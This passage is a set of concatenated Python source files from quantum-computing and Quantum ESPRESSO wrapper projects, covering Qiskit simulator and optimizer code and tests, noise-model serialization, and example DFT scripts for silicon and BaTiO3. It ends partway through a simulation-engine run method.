    def test_optimizer_records_history_if_keep_value_history_is_added_as_option(self):
        optimizer = QiskitOptimizer(
            method="SPSA",
            options={"keep_value_history": True}
        )

        # To check that history is recorded correctly, we wrap cost_function
        # with a recorder. Optimizer should wrap it a second time and
        # therefore we can compare two histories to see if they agree.
        cost_function = recorder(sum_x_squared)

        result = optimizer.minimize(cost_function, np.array([-1, 1]))

        self.assertEqual(result.history, cost_function.history)

    def test_optimizier_does_not_record_history_if_keep_value_history_is_set_to_false(self):
        optimizer = QiskitOptimizer(
            method="SPSA",
            options={"keep_value_history": False}
        )

        result = optimizer.minimize(sum_x_squared, np.array([-2, 0.5]))

        self.assertEqual(result.history, [])

    def _test_optimizer_does_not_record_history_if_keep_value_history_is_not_present_in_options(self):
        # NOTE(review): the leading underscore means unittest never collects
        # this test, and the assertTrue(True) below is a no-op — confirm
        # whether this was disabled deliberately.
        self.assertTrue(True)
        optimizer = QiskitOptimizer(
            method="AMSGRAD",
        )
        result = optimizer.minimize(sum_x_squared, np.array([-2, 0.5]))
        self.assertEqual(result.history, [])
--- FILE SEPARATOR ---
import numpy as np
from qiskit import Aer, IBMQ, execute
from qiskit.providers.ibmq.exceptions import IBMQAccountError
from qiskit.transpiler import CouplingMap
from pyquil.wavefunction import Wavefunction
from openfermion.ops import IsingOperator
from zquantum.core.openfermion import expectation, change_operator_type
from zquantum.core.interfaces.backend import QuantumSimulator
from zquantum.core.measurement import (
expectation_values_to_real,
ExpectationValues,
Measurements,
)
class QiskitSimulator(QuantumSimulator):
    """Qiskit-backed implementation of zquantum's QuantumSimulator interface.

    Wraps a qiskit Aer backend (e.g. "qasm_simulator" or
    "statevector_simulator"), optionally with a noise model, device
    connectivity, and custom basis gates.
    """

    def __init__(
        self,
        device_name,
        n_samples=None,
        noise_model=None,
        device_connectivity=None,
        basis_gates=None,
        api_token=None,
        optimization_level=0,
        **kwargs,
    ):
        """Get a qiskit device (simulator or QPU) that adheres to the
        zquantum.core.interfaces.backend.QuantumSimulator interface.

        Args:
            device_name (string): the name of the device
            n_samples (int): the number of samples to use when running the device
            noise_model (qiskit.providers.aer.noise.NoiseModel): an optional
                noise model to pass in for noisy simulations
            device_connectivity (zquantum.core.circuit.CircuitConnectivity):
                an optional object representing the connectivity of the device
                that will be used in simulations
            basis_gates (list): an optional list of basis gates used in
                simulations; defaults to the noise model's basis gates when a
                noise model is provided
            api_token (string): IBMQ API token
            optimization_level (int): optimization level for the default
                qiskit transpiler (0, 1, 2, or 3)
        """
        self.device_name = device_name
        self.n_samples = n_samples
        self.noise_model = noise_model
        self.device_connectivity = device_connectivity
        self.num_circuits_run = 0
        self.num_jobs_run = 0
        # Default to the noise model's basis gates so circuits are transpiled
        # into gates the noise model actually describes.
        if basis_gates is None and self.noise_model is not None:
            self.basis_gates = self.noise_model.basis_gates
        else:
            self.basis_gates = basis_gates
        if api_token is not None:
            try:
                IBMQ.enable_account(api_token)
            except IBMQAccountError as e:
                # Re-enabling an already-active account is benign; anything
                # else is a genuine failure.
                if (
                    e.message
                    != "An IBM Quantum Experience account is already in use for the session."
                ):
                    raise RuntimeError(e)
        self.optimization_level = optimization_level
        self.get_device(**kwargs)

    @staticmethod
    def _flip_counts(counts):
        """Reverse every bitstring key of a qiskit counts dict.

        Qiskit writes bitstrings with qubit 0 as the rightmost character,
        whereas Measurements.from_counts expects qubit 0 first.
        """
        return {bitstring[::-1]: count for bitstring, count in counts.items()}

    def _build_coupling_map(self):
        """Return a CouplingMap for the configured connectivity, or None."""
        if self.device_connectivity is None:
            return None
        return CouplingMap(self.device_connectivity.connectivity)

    def get_device(self, noisy=False, **kwargs):
        """Get the ibm device used for executing circuits

        Args:
            noisy (bool): a boolean indicating if the user wants to use noisy
                simulations. NOTE(review): currently unused here — noise is
                configured via the constructor's noise_model; confirm intended.

        Raises:
            RuntimeError: if no Aer backend matches self.device_name
        """
        if len(Aer.backends(self.device_name)) > 0:
            self.device = Aer.get_backend(self.device_name)
        else:
            raise RuntimeError(
                "Could not find simulator with name: {}".format(self.device_name)
            )

    def run_circuit_and_measure(self, circuit, **kwargs):
        """Run a circuit and measure a certain number of bitstrings. Note: the
        number of bitstrings measured is derived from self.n_samples

        Args:
            circuit (zquantum.core.circuit.Circuit): the circuit to prepare the state

        Returns:
            zquantum.core.measurement.Measurements: the measured bitstrings
        """
        self.num_circuits_run += 1
        self.num_jobs_run += 1
        num_qubits = len(circuit.qubits)
        ibmq_circuit = circuit.to_qiskit()
        ibmq_circuit.barrier(range(num_qubits))
        ibmq_circuit.measure(range(num_qubits), range(num_qubits))
        # Run job on device and get counts
        raw_counts = (
            execute(
                ibmq_circuit,
                self.device,
                shots=self.n_samples,
                noise_model=self.noise_model,
                coupling_map=self._build_coupling_map(),
                basis_gates=self.basis_gates,
                optimization_level=self.optimization_level,
            )
            .result()
            .get_counts()
        )
        return Measurements.from_counts(self._flip_counts(raw_counts))

    def run_circuitset_and_measure(self, circuitset, **kwargs):
        """Run a set of circuits as a single job and measure bitstrings.
        Note: the number of bitstrings measured is derived from self.n_samples

        Args:
            circuitset (list of zquantum.core.circuit.Circuit): the circuits
                to prepare the states

        Returns:
            list of zquantum.core.measurement.Measurements, one per circuit
        """
        self.num_circuits_run += len(circuitset)
        self.num_jobs_run += 1
        ibmq_circuitset = []
        for circuit in circuitset:
            num_qubits = len(circuit.qubits)
            ibmq_circuit = circuit.to_qiskit()
            ibmq_circuit.barrier(range(num_qubits))
            ibmq_circuit.measure(range(num_qubits), range(num_qubits))
            ibmq_circuitset.append(ibmq_circuit)
        # Run job on device and get counts
        job = execute(
            ibmq_circuitset,
            self.device,
            shots=self.n_samples,
            noise_model=self.noise_model,
            coupling_map=self._build_coupling_map(),
            basis_gates=self.basis_gates,
            optimization_level=self.optimization_level,
        )
        # Fetch the result once instead of re-fetching it for every circuit.
        result = job.result()
        measurements_set = []
        for ibmq_circuit in ibmq_circuitset:
            circuit_counts = result.get_counts(ibmq_circuit)
            measurements_set.append(
                Measurements.from_counts(self._flip_counts(circuit_counts))
            )
        return measurements_set

    def get_expectation_values(self, circuit, qubit_operator, **kwargs):
        """Run a circuit and measure the expectation values with respect to a
        given operator. Note: the number of bitstrings measured is derived
        from self.n_samples - if self.n_samples is None, this falls back to
        self.get_exact_expectation_values

        Args:
            circuit (zquantum.core.circuit.Circuit): the circuit to prepare the state
            qubit_operator (openfermion.ops.QubitOperator): the operator to measure

        Returns:
            zquantum.core.measurement.ExpectationValues: the expectation values
                of each term in the operator
        """
        self.num_circuits_run += 1
        self.num_jobs_run += 1
        # "is None" (not "== None") per PEP 8; behavior is unchanged.
        if self.n_samples is None:
            return self.get_exact_expectation_values(circuit, qubit_operator, **kwargs)
        operator = change_operator_type(qubit_operator, IsingOperator)
        measurements = self.run_circuit_and_measure(circuit)
        expectation_values = measurements.get_expectation_values(operator)
        return expectation_values_to_real(expectation_values)

    def get_exact_expectation_values(self, circuit, qubit_operator, **kwargs):
        """Run a circuit to prepare a wavefunction and measure the exact
        expectation values with respect to a given operator.

        Args:
            circuit (zquantum.core.circuit.Circuit): the circuit to prepare the state
            qubit_operator (openfermion.ops.QubitOperator): the operator to measure

        Returns:
            zquantum.core.measurement.ExpectationValues: the expectation values
                of each term in the operator
        """
        self.num_circuits_run += 1
        self.num_jobs_run += 1
        wavefunction = self.get_wavefunction(circuit)
        # Pyquil does not support PauliSums with no terms.
        if len(qubit_operator.terms) == 0:
            return ExpectationValues(np.zeros((0,)))
        values = [expectation(op, wavefunction) for op in qubit_operator]
        return expectation_values_to_real(ExpectationValues(np.asarray(values)))

    def get_expectation_values_for_circuitset(self, circuitset, operator, **kwargs):
        """Run a set of circuits and measure the expectation values with
        respect to a given operator.

        Args:
            circuitset (list of zquantum.core.circuit.Circuit objects): the
                circuits to prepare the states
            operator (openfermion.ops.IsingOperator or
                openfermion.ops.QubitOperator): the operator to measure

        Returns:
            list of zquantum.core.measurement.ExpectationValues objects: the
                expectation values of each term in the operator with respect
                to the various state preparation circuits
        """
        self.num_circuits_run += len(circuitset)
        self.num_jobs_run += 1
        operator = change_operator_type(operator, IsingOperator)
        measurements_set = self.run_circuitset_and_measure(circuitset)
        expectation_values_set = []
        for measurements in measurements_set:
            expectation_values = measurements.get_expectation_values(operator)
            expectation_values_set.append(
                expectation_values_to_real(expectation_values)
            )
        return expectation_values_set

    def get_wavefunction(self, circuit):
        """Run a circuit and get the wavefunction of the resulting statevector.

        Args:
            circuit (zquantum.core.circuit.Circuit): the circuit to prepare the state

        Returns:
            pyquil.wavefunction.Wavefunction
        """
        self.num_circuits_run += 1
        self.num_jobs_run += 1
        ibmq_circuit = circuit.to_qiskit()
        # Execute job to get wavefunction
        job = execute(
            ibmq_circuit,
            self.device,
            noise_model=self.noise_model,
            coupling_map=self._build_coupling_map(),
            basis_gates=self.basis_gates,
        )
        wavefunction = job.result().get_statevector(ibmq_circuit, decimals=20)
        return Wavefunction(wavefunction)
--- FILE SEPARATOR ---
import pytest
import numpy as np
import os
from pyquil import Program
from pyquil.gates import H, CNOT, RX, CZ, X
from openfermion.ops import QubitOperator
import qiskit.providers.aer.noise as AerNoise
from zquantum.core.circuit import Circuit
from zquantum.core.interfaces.backend_test import QuantumSimulatorTests
from zquantum.core.measurement import ExpectationValues
from ..simulator import QiskitSimulator
from ..noise import get_qiskit_noise_model
@pytest.fixture(
    params=[
        {
            "device_name": "qasm_simulator",
            "n_samples": 1,
            "api_token": os.getenv("ZAPATA_IBMQ_API_TOKEN"),
        },
    ]
)
def backend(request):
    """Qasm simulator configured for single-shot sampling (IBMQ token from env)."""
    simulator_settings = request.param
    return QiskitSimulator(**simulator_settings)
@pytest.fixture(params=[{"device_name": "statevector_simulator"}])
def wf_simulator(request):
    """Statevector simulator for exact-wavefunction tests."""
    return QiskitSimulator(**request.param)
@pytest.fixture(params=[{"device_name": "qasm_simulator"}])
def sampling_simulator(request):
    """Qasm simulator for sampling-based tests (n_samples set per test)."""
    return QiskitSimulator(**request.param)
@pytest.fixture(
    params=[
        {"device_name": "qasm_simulator", "n_samples": 1000, "optimization_level": 0},
    ]
)
def noisy_simulator(request):
    """Qasm simulator wrapped with the ibmqx2 noise model and connectivity."""
    api_token = os.getenv("ZAPATA_IBMQ_API_TOKEN")
    noise_model, connectivity = get_qiskit_noise_model("ibmqx2", api_token=api_token)
    return QiskitSimulator(
        **request.param, noise_model=noise_model, device_connectivity=connectivity
    )
class TestQiskitSimulator(QuantumSimulatorTests):
    """Qiskit-specific tests layered on top of the shared QuantumSimulatorTests suite."""
    def test_run_circuitset_and_measure(self, sampling_simulator):
        """A deterministic circuit (|100>) measured 100 times yields only (1, 0, 0)."""
        # Given
        circuit = Circuit(Program(X(0), CNOT(1, 2)))
        # When
        sampling_simulator.n_samples = 100
        measurements_set = sampling_simulator.run_circuitset_and_measure([circuit])
        # Then
        assert len(measurements_set) == 1
        for measurements in measurements_set:
            assert len(measurements.bitstrings) == 100
            assert all(bitstring == (1, 0, 0) for bitstring in measurements.bitstrings)
        # Given: same circuit submitted 100 times in one batched job
        circuit = Circuit(Program(X(0), CNOT(1, 2)))
        # When
        sampling_simulator.n_samples = 100
        measurements_set = sampling_simulator.run_circuitset_and_measure(
            [circuit] * 100
        )
        # Then
        assert len(measurements_set) == 100
        for measurements in measurements_set:
            assert len(measurements.bitstrings) == 100
            assert all(bitstring == (1, 0, 0) for bitstring in measurements.bitstrings)
    def test_setup_basic_simulators(self):
        """Constructor defaults: every optional setting stays None for both backends."""
        simulator = QiskitSimulator("qasm_simulator")
        assert isinstance(simulator, QiskitSimulator)
        assert simulator.device_name == "qasm_simulator"
        assert simulator.n_samples is None
        assert simulator.noise_model is None
        assert simulator.device_connectivity is None
        assert simulator.basis_gates is None
        simulator = QiskitSimulator("statevector_simulator")
        assert isinstance(simulator, QiskitSimulator)
        assert simulator.device_name == "statevector_simulator"
        assert simulator.n_samples is None
        assert simulator.noise_model is None
        assert simulator.device_connectivity is None
        assert simulator.basis_gates is None
    def test_simulator_that_does_not_exist(self):
        """An unknown backend name raises RuntimeError at construction."""
        # Given/When/Then
        with pytest.raises(RuntimeError):
            QiskitSimulator("DEVICE DOES NOT EXIST")
    def test_expectation_value_with_noisy_simulator(self, noisy_simulator):
        """<Z0> on a |1> state decays toward 0 as more (noisy) gates are applied."""
        # Given
        # Initialize in |1> state
        circuit = Circuit(Program(X(0)))
        # Flip qubit an even number of times to remain in the |1> state, but allow decoherence to take effect
        circuit += Circuit(Program([X(0) for _ in range(10)]))
        qubit_operator = QubitOperator("Z0")
        noisy_simulator.n_samples = 8192
        # When
        expectation_values_10_gates = noisy_simulator.get_expectation_values(
            circuit, qubit_operator
        )
        # Then: value lies strictly between -1 (ideal) and 0 (fully decohered)
        assert isinstance(expectation_values_10_gates, ExpectationValues)
        assert len(expectation_values_10_gates.values) == 1
        assert expectation_values_10_gates.values[0] > -1
        assert expectation_values_10_gates.values[0] < 0.0
        assert isinstance(noisy_simulator, QiskitSimulator)
        assert noisy_simulator.device_name == "qasm_simulator"
        assert noisy_simulator.n_samples == 8192
        assert isinstance(noisy_simulator.noise_model, AerNoise.NoiseModel)
        assert noisy_simulator.device_connectivity is not None
        assert noisy_simulator.basis_gates is not None
        # Given
        # Initialize in |1> state
        circuit = Circuit(Program(X(0)))
        # Flip qubit an even number of times to remain in the |1> state, but allow decoherence to take effect
        circuit += Circuit(Program([X(0) for _ in range(50)]))
        qubit_operator = QubitOperator("Z0")
        noisy_simulator.n_samples = 8192
        # When
        expectation_values_50_gates = noisy_simulator.get_expectation_values(
            circuit, qubit_operator
        )
        # Then: 50 noisy gates decohere more than 10, so <Z0> is closer to 0
        assert isinstance(expectation_values_50_gates, ExpectationValues)
        assert len(expectation_values_50_gates.values) == 1
        assert expectation_values_50_gates.values[0] > -1
        assert expectation_values_50_gates.values[0] < 0.0
        assert (
            expectation_values_50_gates.values[0]
            > expectation_values_10_gates.values[0]
        )
        assert isinstance(noisy_simulator, QiskitSimulator)
        assert noisy_simulator.device_name == "qasm_simulator"
        assert noisy_simulator.n_samples == 8192
        assert isinstance(noisy_simulator.noise_model, AerNoise.NoiseModel)
        assert noisy_simulator.device_connectivity is not None
        assert noisy_simulator.basis_gates is not None
    def test_optimization_level_of_transpiler(self):
        """Full transpiler optimization collapses the 51 X gates, so the
        compiled run decoheres less and gives a more negative <Z0>."""
        # Given
        noise_model, connectivity = get_qiskit_noise_model(
            "ibmqx2", api_token=os.getenv("ZAPATA_IBMQ_API_TOKEN")
        )
        simulator = QiskitSimulator(
            "qasm_simulator",
            n_samples=8192,
            noise_model=noise_model,
            device_connectivity=connectivity,
            optimization_level=0,
        )
        qubit_operator = QubitOperator("Z0")
        # Initialize in |1> state
        circuit = Circuit(Program(X(0)))
        # Flip qubit an even number of times to remain in the |1> state, but allow decoherence to take effect
        circuit += Circuit(Program([X(0) for _ in range(50)]))
        # When
        expectation_values_no_compilation = simulator.get_expectation_values(
            circuit, qubit_operator
        )
        simulator.optimization_level = 3
        expectation_values_full_compilation = simulator.get_expectation_values(
            circuit, qubit_operator
        )
        # Then
        assert (
            expectation_values_full_compilation.values[0]
            < expectation_values_no_compilation.values[0]
        )
--- FILE SEPARATOR ---
import qiskit.providers.aer.noise as AerNoise
import qiskit.quantum_info.operators.channel as Channel
from typing import TextIO
import json
from zquantum.core.utils import SCHEMA_VERSION, convert_array_to_dict, convert_dict_to_array
import numpy as np
def save_qiskit_noise_model(noise_model: AerNoise.NoiseModel, filename: str) -> None:
    """Serialize a qiskit aer noise model to a JSON file.

    The envelope records the loader location (module/function) and a schema
    tag alongside the serialized model data.

    Args:
        noise_model (qiskit.providers.aer.noise.NoiseModel): the noise model to be saved
        filename (str): the name of the file
    """
    envelope = {
        "module_name": "qeqiskit.utils",
        "function_name": "load_qiskit_noise_model",
        "schema": SCHEMA_VERSION + "-noise-model",
        "data": noise_model.to_dict(serializable=True),
    }
    with open(filename, "w") as output_file:
        json.dump(envelope, output_file, indent=2)
def load_qiskit_noise_model(data: dict) -> AerNoise.NoiseModel:
    """Deserialize a qiskit aer noise model.

    Args:
        data (dict): the serialized version of the qiskit noise model

    Returns:
        (qiskit.providers.aer.noise.NoiseModel): the noise model
    """
    noise_model = AerNoise.NoiseModel.from_dict(data)
    return noise_model
def save_kraus_operators(kraus: dict, filename: str) -> None:
    """Save kraus operators to a JSON file.

    Args:
        kraus (Dict): maps gate names to lists of kraus operators (arrays)
        filename (str): the name of the file

    Note:
        Unlike the previous implementation, the caller's dict is NOT mutated:
        the arrays are converted in a serializable copy, and the 'schema' key
        is only added to that copy.
    """
    serializable = {
        gate: [convert_array_to_dict(operator) for operator in operators]
        for gate, operators in kraus.items()
    }
    # NOTE(review): no "-" separator before 'kraus-dict', unlike "-noise-model"
    # above — kept byte-identical for file compatibility; confirm intended.
    serializable['schema'] = SCHEMA_VERSION +'kraus-dict'
    with open(filename, 'w') as f:
        f.write(json.dumps(serializable, indent=2))
def load_kraus_operators(file):
    """Load kraus dictionary from a file.

    Args:
        file (str or file-like object): the name of the file, or a file-like object.

    Returns:
        dict: the kraus dict, with each serialized operator converted back to an array.
    """
    # Accept either a path or an already-open file object.
    if isinstance(file, str):
        with open(file, 'r') as f:
            data = json.load(f)
    else:
        data = json.load(file)
    # The schema tag is metadata, not a gate entry.
    del data['schema']
    for gate, operators in data.items():
        for index, operator in enumerate(operators):
            operators[index] = convert_dict_to_array(operator)
    return data
--- FILE SEPARATOR ---
from zquantum.core.circuit import save_circuit_connectivity
from qeqiskit.utils import save_qiskit_noise_model
from qeqiskit.noise import get_qiskit_noise_model as _get_qiskit_noise_model
def get_qiskit_noise_model(
    device_name, hub="ibm-q", group="open", project="main", api_token=None
):
    """Workflow step: fetch the noise model and connectivity of an IBMQ device
    and save them as JSON artifacts.

    Args:
        device_name (str): the IBMQ device to characterize, e.g. "ibmqx2"
        hub (str): IBMQ provider hub
        group (str): IBMQ provider group
        project (str): IBMQ provider project
        api_token (str): IBMQ API token; the literal string "None" is treated
            as absent (workflow engines pass unset secrets through as text)
    """
    # Bug fix: was `api_token is "None"` — identity comparison with a str
    # literal is implementation-dependent and raises SyntaxWarning; equality
    # is the correct check here.
    if api_token == "None":
        api_token = None
    noise_model, device_connectivity = _get_qiskit_noise_model(
        device_name,
        hub=hub,
        group=group,
        project=project,
        api_token=api_token,
    )
    save_qiskit_noise_model(noise_model, "noise-model.json")
    save_circuit_connectivity(device_connectivity, "device-connectivity.json")
--- FILE SEPARATOR ---
# Validation step: simply report that the upstream data matched expectations.
message = "Data is as expected"
print(message)
|
[
"/src/python/qeqiskit/backend/backend.py",
"/src/python/qeqiskit/backend/backend_test.py",
"/src/python/qeqiskit/noise/__init__.py",
"/src/python/qeqiskit/noise/basic.py",
"/src/python/qeqiskit/optimizer/__init__.py",
"/src/python/qeqiskit/optimizer/optimizer.py",
"/src/python/qeqiskit/optimizer/optimizer_test.py",
"/src/python/qeqiskit/simulator/simulator.py",
"/src/python/qeqiskit/simulator/simulator_test.py",
"/src/python/qeqiskit/utils.py",
"/steps/noise.py",
"/testing/v1/data_validation/get-qiskit-noise-model.py"
] |
00mjk/quantum-espresso-wrapper
|
# Example script: build a silicon CUDS simulation and run pw.x (SCF) and pp.x
# through the Quantum ESPRESSO wrapper session.
import numpy as np
from osp.core.namespaces import QE
from osp.core.utils import pretty_print
from osp.wrappers.quantumespresso.qe_session import qeSession
# Creates simulation and a 7x7x7 automatic k-point mesh
sim = QE.Simulation()
k = QE.K_POINTS(vector6 = (7, 7, 7, 0, 0, 0), unit = "")
# Creates a cell, the element Silicon, a pseudopotential, an atom and the lattice constant
SiCell = QE.Cell()
Si = QE.Element(name = "Si")
SiPseudo = QE.PSEUDOPOTENTIAL(path = "Si.pbe-n-kjpaw_psl.1.0.0.UPF")
Si1 = QE.Atom()
celldm1 = QE.Celldm1(value = 5.43070, unit = "au")
# Adds pseudopotential, atom and mass to the element
Si.add(SiPseudo, Si1)
Si.add(QE.Mass(value = 28.085, unit = "amu"))
# FCC primitive lattice vectors (fractions of the lattice constant)
SiParams = QE.CellParams(tensor2 = [[0.5, 0.5, 0.],
                                    [0.5, 0., 0.5],
                                    [0., 0.5, 0.5]], unit = "")
# Adds atom and cell parameters to the cell; positions the atom at the origin
SiCell.add(Si1, SiParams)
Si1.add(QE.Position(vector = (0, 0, 0), unit = ""))
SiCell.add(celldm1)
# Adds cell, element, k-points and target conditions to the simulation
sim.add(SiCell)
sim.add(Si)
sim.add(k)
sim.add(QE.Pressure(value = 100, unit = "kbar"))
sim.add(QE.StressTensor(tensor2 = np.zeros((3, 3)), unit = "kbar"))
# Directory prefix for generated input/output files ("" = current directory)
root = ""
SiCell.add(QE.Volume(value = 22, unit = "au^3"))
sim.add(QE.TotalEnergy(value = -434, unit = "Ry"))
# Phonon q-point with three modes (used by ph.x-style runs)
q = QE.QPoint(vector = (0, 0, 0), unit = "", calculate = True)
sim.add(q)
q.add(QE.Mode(number = 3))
q.add(QE.Mode(number = 2))
q.add(QE.Mode(number = 1))
# Second simulation — only needed by the commented-out ev.x aggregation below
sim2 = QE.Simulation()
fd = QE.Cell()
sim2.add(fd)
fd.add(QE.Volume(value = 33, unit = "au^3"))
sim2.add(QE.TotalEnergy(value = -432, unit = "Ry"))
with qeSession(root) as session:
    # Adds session to wrapper
    quantum_espresso_wrapper = QE.QEWrapper(session = session)
    # Adds simulation to wrapper
    sim = quantum_espresso_wrapper.add(sim)
    # pretty_print(sim)
    # The session writes an input file from the simulation, runs the
    # executable, and reads the results back into the CUDS tree.
    print("Running calculation...")
    # Runs the SCF calculation with pw.x
    # pretty_print(quantum_espresso_wrapper)
    # pretty_print(quantum_espresso_wrapper)
    quantum_espresso_wrapper.session._run(simulation = sim, prefix = "si", command_type = "pw.x", calculation_type = "scf", root = root)
    # Alternative runs kept for reference:
    # quantum_espresso_wrapper.session._run(simulation = sim, prefix = "si", command_type = "pw.x", calculation_type = "bands")
    # quantum_espresso_wrapper.session._run(simulation = sim, prefix = "si", command_type = "bands.x", calculation_type = "")
    # quantum_espresso_wrapper.session._run(simulation = sim, prefix = "si", command_type = "pw.x", calculation_type = "relax", IONS = {'ion_dynamics': "'bfgs'"})
    # quantum_espresso_wrapper.session._run(simulation = sim, prefix = "si", command_type = "pw.x", calculation_type = "scf", SYSTEM = {'occupations': "'tetrahedra'"})
    # quantum_espresso_wrapper.session._run(simulation = sim, prefix = "si", command_type = "dos.x", calculation_type = "")
    # Post-processing with pp.x (calculation_type/PLOT semantics are defined by ppUtils)
    quantum_espresso_wrapper.session._run(simulation = sim, prefix = "si", command_type = "pp.x", calculation_type = 9, PLOT = {"output_format": 6})
    # quantum_espresso_wrapper.session._run(simulation = [sim, sim2], prefix = 'si', command_type = "ev.x", calculation_type = '1')
    # quantum_espresso_wrapper.session._run(simulation = sim, prefix = "si", command_type = "ph.x", calculation_type = "")
    # quantum_espresso_wrapper.session._run(simulation = sim, prefix = "si", command_type = "plotband.x", calculation_type = "", params = {'Input file': 'si.bands.dat', 'Emin, Emax': "-6 17", "gnuplot": "gnuplot", "ps": "si.bands.ps", "Efermi": "0", "deltaE": "5 0"})
    # Pretty prints the updated simulation
    pretty_print(sim)
    # pretty_print(sim2)
    # print("Results: ")
--- FILE SEPARATOR ---
#!/usr/bin/env python
# -*- coding: utf-8 -*-
###########################################################################
# Copyright (c), The AiiDA team. All rights reserved.                     #
# This file is part of the AiiDA code.                                    #
#                                                                         #
# The code is hosted on GitHub at https://github.com/aiidateam/aiida_core #
# For further information on the license, see the LICENSE.txt file        #
# For further information please visit http://www.aiida.net               #
###########################################################################
# Demo: submit a Quantum ESPRESSO pw.x SCF calculation for cubic BaTiO3
# through AiiDA.
from aiida import load_profile
from aiida.orm import Code
from aiida.plugins import DataFactory
from aiida.engine import submit
from aiida.orm.nodes.data.upf import get_pseudos_from_structure
from aiida.engine import run
load_profile()
StructureData = DataFactory('structure')
Dict = DataFactory('dict')
KpointsData = DataFactory('array.kpoints')
###############################
# Set your values here
codename = 'Quantum ESPRESSO@mbxp'
pseudo_family = 'pbe-spn-kjpaw_psl'
# These require setting up beforehand
###############################
code = Code.get_from_string(codename)
builder = code.get_builder()
# BaTiO3 cubic structure
alat = 4. # angstrom
cell = [[alat, 0., 0.,],
        [0., alat, 0.,],
        [0., 0., alat,]]
s = StructureData(cell=cell)
s.append_atom(position=(0., 0., 0.), symbols='Ba')
s.append_atom(position=(alat / 2., alat / 2., alat / 2.), symbols='Ti')
s.append_atom(position=(alat / 2., alat / 2., 0.), symbols='O')
s.append_atom(position=(alat / 2., 0., alat / 2.), symbols='O')
s.append_atom(position=(0., alat / 2., alat / 2.), symbols='O')
# pw.x namelist parameters for a from-scratch SCF run
parameters = Dict(
    dict={
        'CONTROL': {
            'calculation': 'scf',
            'restart_mode': 'from_scratch',
            'wf_collect': True,
        },
        'SYSTEM': {
            'ecutwfc': 30.,
            'ecutrho': 240.,
        },
        'ELECTRONS': {
            'conv_thr': 1.e-6,
        }
    }
)
# 4x4x4 Monkhorst-Pack k-point mesh
kpoints = KpointsData()
kpoints.set_kpoints_mesh([4, 4, 4])
builder.pseudos = get_pseudos_from_structure(s, pseudo_family)
builder.metadata.options.resources = {'num_machines': 1}
builder.metadata.options.max_wallclock_seconds = 1800
builder.metadata.label = 'My generic title'
builder.metadata.description = 'My generic description'
builder.structure = s
builder.parameters = parameters
builder.kpoints = kpoints
# NOTE(review): submit() launches the calculation asynchronously AND run()
# executes it again, blocking — the calculation runs twice, and calc.res may
# not be populated when printed below. Likely only one of the two is
# intended; confirm.
calc = submit(builder)
results = run(builder)
print('created calculation with PK={}'.format(calc.pk))
print(calc.res)
--- FILE SEPARATOR ---
# Example script: build a cubic BaTiO3 CUDS simulation and run a pw.x SCF
# calculation through the Quantum ESPRESSO wrapper session.
import numpy as np
from osp.core.namespaces import QE
from osp.wrappers.quantumespresso.qe_session import qeSession
from osp.core.utils import pretty_print
sim = QE.Simulation()
# Directory prefix for generated files ("" = current directory)
root = ""
session = qeSession(root)
quantum_espresso_wrapper = QE.QEWrapper(session = session)
quantum_espresso_wrapper.add(sim)
# Simple cubic cell: identity lattice vectors scaled by the lattice constant
cell = QE.Cell()
alat = 4.
cellParams = cell.add(QE.CellParams(tensor2 =
                                    [[1., 0., 0.,],
                                     [0., 1., 0.,],
                                     [0., 0., 1.,]], unit = "alat"))
cell.add(QE.Celldm1(value = alat, unit = ""))
# Elements with masses and pseudopotentials
O = QE.Element(name = "O")
Ba = QE.Element(name = "Ba")
Ti = QE.Element(name = "Ti")
O.add(QE.Mass(value = 15.999, unit = "amu"))
Ba.add(QE.Mass(value = 137.327, unit = "amu"))
Ti.add(QE.Mass(value = 47.867, unit = "amu"))
O.add(QE.PSEUDOPOTENTIAL(path = "O.pbe-n-kjpaw_psl.1.0.0.UPF"))
Ba.add(QE.PSEUDOPOTENTIAL(path = "Ba.pbe-spn-kjpaw_psl.1.0.0.UPF"))
Ti.add(QE.PSEUDOPOTENTIAL(path = "Ti.pbe-spn-kjpaw_psl.1.0.0.UPF"))
# One atom per element occurrence in the perovskite cell
O1 = O.add(QE.Atom())
O2 = O.add(QE.Atom())
O3 = O.add(QE.Atom())
Ba1 = Ba.add(QE.Atom())
Ti1 = Ti.add(QE.Atom())
# Fractional positions: Ba at the corner, Ti at the body center, O on the faces
O1.add(QE.Position(vector = [0.5, 0.5, 0.], unit = ""))
O2.add(QE.Position(vector = [0.5, 0., 0.5], unit = ""))
O3.add(QE.Position(vector = [0., 0.5, 0.5], unit = ""))
Ba1.add(QE.Position(vector = [0., 0., 0.], unit = ""))
Ti1.add(QE.Position(vector = [0.5, 0.5, 0.5], unit = ""))
cell.add(O1, O2, O3, Ba1, Ti1)
# 4x4x4 automatic k-point mesh
kpoints = QE.K_POINTS(vector6 = (4, 4, 4, 0, 0, 0), unit = "automatic")
sim.add(cell, O, Ba, Ti, kpoints)
# Namelist overrides forwarded to the utils class via **kwargs below
paramdict = {
    'CONTROL': {
        'calculation': 'scf',
        'restart_mode': 'from_scratch',
        'wf_collect': '.true.',
    },
    'SYSTEM': {
        'ecutwfc': 30.,
        'ecutrho': 240.,
    },
    'ELECTRONS': {
        'conv_thr': 1.e-6,
    }
}
# Show the simulation tree before and after the run
pretty_print(sim)
session._run(simulation = sim, prefix = "BaTiO3", command_type="pw.x", calculation_type="scf", root = root, **paramdict)
pretty_print(sim)
--- FILE SEPARATOR ---
import subprocess
import pexpect
import osp.wrappers.quantumespresso.qe_utils
class SimulationEngine:
    """Executes a Quantum ESPRESSO command prepared by a qeSession.

    The session supplies the command type, the input/output file names, and a
    qe_utils helper that knows how to drive the chosen executable.
    """

    def __init__(self, session):
        """Store the owning session.

        Args:
            session: the qeSession that prepared input files and parameters.
        """
        self._session = session

    def run(self):
        """Run the session's command, interactively or in batch mode.

        Interactive commands (whose utils class derives from cliUtils) are
        driven through pexpect, using the utils' params keys as expect
        patterns and the values as responses. Everything else is executed as
        a shell command that redirects the input file into the output file.

        Raises:
            RuntimeError: if the batch subprocess cannot be started.
        """
        input_file = self._session._qe_utils._file_path_root + self._session._input_file
        output_file = self._session._qe_utils._file_path_root + self._session._output_file
        # Using pexpect, checks type of parent class. If it's cliUtils, then use params keys as expect
        # and send params values. Do not remove wait, otherwise command will not run.
        if self._session._qe_utils.__class__.__base__ == osp.wrappers.quantumespresso.qe_utils.cliUtils:
            child = pexpect.spawn(self._session._command_type)
            for prompt, response in self._session._qe_utils.params.items():
                child.expect(prompt)
                child.sendline(response)
            child.wait()
        else:
            # Batch mode. shell=True is required for the ">" redirection.
            # NOTE(review): the command pieces come from session configuration,
            # not untrusted user input — confirm before exposing this further.
